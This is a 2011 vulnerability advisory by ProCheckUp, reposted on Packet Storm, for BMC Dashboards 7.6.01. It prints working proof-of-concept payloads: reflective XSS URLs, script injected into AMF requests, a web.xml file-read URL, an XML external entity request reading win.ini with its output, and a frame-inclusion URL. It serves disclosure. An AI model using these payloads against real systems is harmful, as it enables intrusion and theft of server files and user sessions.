BMC Dashboards 7.6.01 XSS / File Reading

2011-05-05T00:00:00
ID PACKETSTORM:101163
Type packetstorm
Reporter ProCheckUp
Modified 2011-05-05T00:00:00

Description

                                        
                                            `PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading  
flaws within BMC Dashboards by BMC  
  
Vulnerability found: 1st Oct 2010  
  
Vendor informed:  
  
Vulnerability fixed:  
  
Severity: High  
  
Description:  
  
BMC Dashboards provides service desk analysts with a dashboard view of  
aggregated performance indicators, enabling timely fact based decisions.  
ProCheckUp has discovered that multiple Remedy Knowledge Management  
pages are vulnerable to reflective XSS attacks, along with a directory  
traversal vulnerability which allows arbitrary files to be read outside  
the web-root.  
  
Version: 7.6.01 - http://www.bmc.com/  
  
1) The following demonstrate the reflective XSS flaw  
  
a)  
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm  
  
b)  
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>  
  
c) multiple XSS within demo pages  
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>  
  
https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean  
  
d) Multiple XSS as the AMF stream is unfiltered  
  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
Content-Type: application/x-amf  
Host: target-domain.foo  
Content-Length: 462  
........null../58..... ..  
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation  
  
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........  
#.  
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>  
..  
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.  
#. name.version..208Archive..1.0...  
.Cflex.messaging.io.ArrayCollection ..  
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade  
  
results:-  
HTTP/1.1 200 OK  
Date: Sat, 02 Oct 2010 00:15:35 GMT  
Server: Microsoft-IIS/6.0  
X-Powered-By: ASP.NET  
Content-Type: application/x-amf  
Content-Length: 4651  
  
......../58/onStatus.......  
.SIflex.messaging.messages.ErrorMessage.headers.rootCause  
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId  
..  
..acom.bmc.bsm.dashboards.util.logging.BSDException.message  
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System  
error. Contact your system administrator for assistance.  
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0  
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber  
  
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage  
.  
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not  
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d  
  
Consequences:  
An attacker may be able to cause execution of malicious scripting code  
in the browser of a user who clicks on a link to Remedy Knowledge  
Management based site. Such code would run within the security context  
of the target domain. This type of attack can result in non-persistent  
defacement of the target site, or the redirection of confidential  
information (i.e.: session IDs) to unauthorised third parties. No  
authentication is required to exploit this vulnerability.  
  
2) Application is vulnerable to file source code reading limited to the  
web-root.  
  
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml  
  
Consequences:  
File source code reading allows Files to be retrieved from the target  
server, provided that the location on the file system is known. No  
authentication is required to exploit this vulnerability.  
  
3) Verbose error pages - when parsing malicious amf messages  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
Host: target-domain.foo  
Content-Type: application/x-amf  
Content-Length: 462  
  
COflex.messaging.messages.RemotingMessagetimestampheadersoperation body  
sourceremotePasswordremoteUsernameparametersmessageIdtimeToLiveclientIddestination  
  
SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId  
  
acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessagecauseargumentsprioritytracebackerrorCodecauseSummarySystem  
error. Contact your system administrator for assistance.  
Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80  
3;java.io.FileNotFoundException"$?cf:\Program Files\BMC  
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar  
(The filename, directory name, or volume label syntax is  
incorrect):ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System  
error. Contact your system administrator for assistance.  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)  
at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)  
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)  
at java.lang.reflect.Method.invoke(Unknown Source)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)  
at $Proxy54.getUndefinedDataSources(Unknown Source)  
  
  
4) Vulnerable to directory traversal as uses Adobe BlazeDS, breaking  
out of the webroot see http://seclists.org/fulldisclosure/2010/Feb/383  
  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
  
Host: target-domain.foo  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)  
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)  
Content-type: application/x-amf  
  
POST DATA  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>  
<amfx ver="3"><body>  
<object type="flex.messaging.messages.CommandMessage">  
<traits>  
  
<string>body</string><string>clientId</string><string>correlationId</string>  
  
<string>destination</string><string>headers</string><string>messageId</string>  
  
<string>operation</string><string>timestamp</string><string>timeToLive</string>  
</traits><object><traits />  
</object>  
<null /><string /><string />  
<object>  
<traits>  
<string>DSId</string><string>DSMessagingVersion</string>  
</traits>  
<string>nil</string><int>1</int>  
</object>  
<string>&x3;</string>  
<int>5</int><int>0</int><int>0</int>  
</object>  
</body>  
</amfx>  
  
  
win.ini  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
[MCI Extensions.BAK]  
aif=MPEGVideo  
aifc=MPEGVideo  
aiff=MPEGVideo  
asf=MPEGVideo  
asx=MPEGVideo  
au=MPEGVideo  
m1v=MPEGVideo  
m3u=MPEGVideo  
mp2=MPEGVideo  
mp2v=MPEGVideo  
mp3=MPEGVideo  
mpa=MPEGVideo  
mpe=MPEGVideo  
mpeg=MPEGVideo  
mpg=MPEGVideo  
mpv2=MPEGVideo  
snd=MPEGVideo  
wax=MPEGVideo  
wm=MPEGVideo  
wma=MPEGVideo  
wmv=MPEGVideo  
wmx=MPEGVideo  
wpl=MPEGVideo  
wvx=MPEGVideo  
  
Consequences:  
Directory traversal allows Files to be retrieved from the target server  
outside the webroot, provided that the location on the file system is  
known. Arbitrary file uploading should also be possible, no  
authentication is required to exploit this vulnerability.  
  
5) Application is vulnerable to remote frame inclusion  
  
https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com  
  
Consequences:  
An attacker may be able to gain access to confidential data, by carry  
out a phishing attack.  
  
Fix:  
  
References:  
http://www.procheckup.com/Vulnerabilities.php  
  
Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)  
  
Legal:  
Copyright 2010 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is attributed  
to Procheckup, and provided such reproduction and/or distribution is  
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
  
  
`